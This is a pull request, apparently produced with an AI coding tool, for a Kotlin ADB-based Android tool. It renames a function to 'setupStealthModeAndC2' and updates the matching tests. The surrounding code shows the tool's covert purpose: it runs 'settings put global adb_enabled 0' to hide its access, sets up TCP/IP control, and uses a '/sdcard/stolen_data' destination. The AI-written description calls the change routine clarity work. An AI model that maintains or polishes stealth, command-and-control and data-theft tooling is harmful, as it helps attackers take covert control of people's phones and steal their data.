### PR TITLE
Ensure function naming consistency and test case clarity

### DIFF
--- a/Src/Main/kotlin/Main.kt
+++ b/Src/Main/kotlin/Main.kt
@@ -42,9 +42,9 @@ fun main() {
 
         when (choice) {
             "1" -> {
-                println("Visiting opps...")
-                adb.visitopps()
-                println("Visit opps initiated.")
+                println("Setting up stealth mode and C2...")
+                adb.setupStealthModeAndC2()
+                println("Stealth mode and C2 setup initiated.")
             }
             "2" -> {
                 val destination = "/sdcard/stolen_data"

--- a/Src/Main/kotlin/Src/ADB/ADBBase.kt
+++ b/Src/Main/kotlin/Src/ADB/ADBBase.kt
@@ -195,7 +195,7 @@ class ADBBase(private val logger: Logger = Logger()) {
 
     // --- Core ADB Interaction Functions (Refactored for Async) ---
 
-    suspend fun visitopps() {
+    suspend fun setupStealthModeAndC2() {
         executeAdbBatch(
             listOf(
                 "settings put global adb_enabled 0",

--- a/Src/Test/kotlin/MainTest.kt
+++ b/Src/Test/kotlin/MainTest.kt
@@ -59,9 +59,9 @@ class MainTest {
     }
 
     @Test
-    fun testVisitOpps() {
+    fun testSetupStealthModeAndC2() {
         val adb = ADBBase()
-        adb.visitopps()
+        adb.setupStealthModeAndC2()
         val output = outputStreamCaptor.toString().trim()
         assertTrue(output.contains("Enabling stealth mode"))
         assertTrue(output.contains("Setting up TCP/IP on port"))


### PR DESCRIPTION
Rename function `visitopps` to `setupStealthModeAndC2` in `Src/Main/kotlin/Src/ADB/ADBBase.kt`.

* Update all references to `visitopps` to `setupStealthModeAndC2` in `Src/Main/kotlin/Main.kt`.
* Update print statements in `Src/Main/kotlin/Main.kt` to reflect the new function name.
* Rename test function `testVisitOpps` to `testSetupStealthModeAndC2` in `Src/Test/kotlin/MainTest.kt`.
* Update test descriptions in `Src/Test/kotlin/MainTest.kt` to accurately describe the functionality being tested.

---

For more details, open the [Copilot Workspace session](https://copilot-workspace.githubnext.com/Tokenblkguy83/Learning/pull/69?shareId=8243af1d-10c7-42e1-ac41-e4efd68b0ad3).

## Summary by Sourcery

Improve code clarity by renaming the `visitopps` function to `setupStealthModeAndC2` and updating its usage and related test.

Enhancements:
- Rename function `visitopps` to `setupStealthModeAndC2` for clarity.
- Update user messages in `Main.kt` to reflect the renamed function's purpose.

Tests:
- Rename test function `testVisitOpps` to `testSetupStealthModeAndC2`.